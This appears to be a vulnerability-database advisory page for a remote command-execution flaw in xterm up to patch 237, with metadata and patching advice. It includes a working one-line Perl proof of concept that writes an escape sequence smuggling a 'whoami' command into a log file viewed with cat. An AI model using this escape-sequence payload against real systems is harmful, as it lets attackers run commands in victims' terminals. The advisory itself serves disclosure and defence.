header-logo
Suggest Exploit
vendor:
xterm
by:
7.5
CVSS
HIGH
Remote Command Execution
78
CWE
Product Name: xterm
Affected Version From: Unknown
Affected Version To: Patch 237
Patch Exists: YES
Related CWE:
CPE: a:xterm:xterm
Metasploit:
Other Scripts:
Platforms Tested:

Remote Command Execution Vulnerability in xterm

The 'xterm' program is prone to a remote command-execution vulnerability because it fails to sufficiently validate user input. Successfully exploiting this issue would allow an attacker to execute arbitrary commands on an affected computer in the context of the affected application.

Mitigation:

Apply the latest patch or update from the vendor.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/33060/info

The 'xterm' program is prone to a remote command-execution vulnerability because it fails to sufficiently validate user input.

Successfully exploiting this issue would allow an attacker to execute arbitrary commands on an affected computer in the context of the affected application.

The issue affects xterm with patch 237; other versions may also be affected.

The following example is available:

perl -e 'print "\eP\$q\nwhoami\n\e\\"' > bla.log
cat bla.log

Navigation

Suggest Exploit

Services By CQR